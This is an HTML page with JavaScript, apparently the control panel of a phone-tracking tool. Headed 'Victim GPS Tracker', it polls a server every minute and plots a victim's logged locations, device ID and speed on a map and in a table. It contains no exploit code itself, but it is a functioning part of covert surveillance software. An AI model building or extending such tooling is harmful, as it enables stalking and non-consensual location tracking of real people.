<html lang="en">

<head>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
        integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
    <link rel="shortcut icon"
        href="https://icons.iconarchive.com/icons/dakirby309/simply-styled/256/OS-Android-icon.png">
    <link rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/openlayers/openlayers.github.io@master/en/v6.4.3/css/ol.css" type="text/css">
    <style>
        .map {
            height: 70vh;
        }
    </style>
    <script src="https://cdn.jsdelivr.net/gh/openlayers/openlayers.github.io@master/en/v6.4.3/build/ol.js"></script>
    <title>GPS TRAKING</title>
</head>

<body>
    <div class="container">
        <h2>Victim GPS Tracker</h2>
        <p>This is the map with all the places where the victim has been registered numbered in a time order. Click on
            markers for more info.</p>
    </div>
    <div id="map" class="map"></div>
    <table id="table"></table>
    <script type="text/javascript">
        fetch()
        setInterval(function () {
            fetch()
        }, 60000);

        function fetch() {
            var xobj = new XMLHttpRequest();
            xobj.open('GET', '/points', true);
            xobj.onreadystatechange = function () {
                if (xobj.readyState == 4 && xobj.status == "200") {
                    const data = JSON.parse(xobj.responseText).data
                    loadMap(data)
                    tableCreate(data)
                }
            };
            xobj.send(null);
        }
        function loadMap(markersData) {
            document.getElementById("map").innerHTML = '';
            Markers = markersData;

            var map = new ol.Map({
                target: 'map',
                layers: [
                    new ol.layer.Tile({
                        source: new ol.source.OSM()
                    })
                ],
                view: new ol.View({
                    center: ol.proj.fromLonLat([12.22, 45.37]),
                    zoom: 6
                })
            });

            var features = [];


            for (var i = 0; i < Markers.length; i++) {
                var item = Markers[i];
                var longitude = item.lon;
                var latitude = item.lat;

                var iconFeature = new ol.Feature({
                    geometry: new ol.geom.Point(ol.proj.transform([longitude, latitude], 'EPSG:4326', 'EPSG:3857')),
                    date: item.date,
                    device: item.device
                });

                var iconStyle = new ol.style.Style({
                    image: new ol.style.Icon(({
                        anchor: [0.5, 1],
                        src: "http://cdn.mapmarker.io/api/v1/pin?text=" + (i + 1) + "&size=50&hoffset=1"
                    }))
                });

                iconFeature.setStyle(iconStyle);
                features.push(iconFeature);
            }

            var vectorSource = new ol.source.Vector({
                features: features
            });

            var vectorLayer = new ol.layer.Vector({
                source: vectorSource
            });
            map.addLayer(vectorLayer);

            map.getView().fit(vectorSource.getExtent());
            map.getView().setZoom(map.getView().getZoom() - 1);

            map.on('click', function (evt) {
                var feature = map.forEachFeatureAtPixel(evt.pixel,
                    function (feature) {
                        return feature;
                    });
                if (feature) {
                    alert("Date: " + feature.getProperties().date + "\nDevice: " + feature.getProperties().device)
                }
            });
        }

        function tableCreate(data) {
            document.getElementById("table").innerHTML = '';
            var tbl = document.getElementById("table");
            tbl.style.width = '100%';
            tbl.style.border = '1px solid black';

            const header = ['#', 'Latitude', 'Longitude', 'Date', 'Device ID', 'Accuracy (m)', 'Altitude (m)', 'Speed (m/s)'];
            var row = table.insertRow(-1);
            for (var i = 0; i < 8; i++) {
                var headerCell = document.createElement("TH");
                headerCell.innerHTML = header[i];
                row.appendChild(headerCell);
            }

            data.slice().reverse().forEach((el, id) => {
                const cells = Object.values(el);
                var tr = tbl.insertRow();
                var td = tr.insertCell();
                td.appendChild(document.createTextNode(data.length - id));
                td.style.border = '1px solid black';
                for (var i = 0; i < 7; i++) {
                    var td = tr.insertCell();
                    td.appendChild(document.createTextNode(cells[i]));
                    td.style.border = '1px solid black';
                }
            })
        }
    </script>
</body>
</html>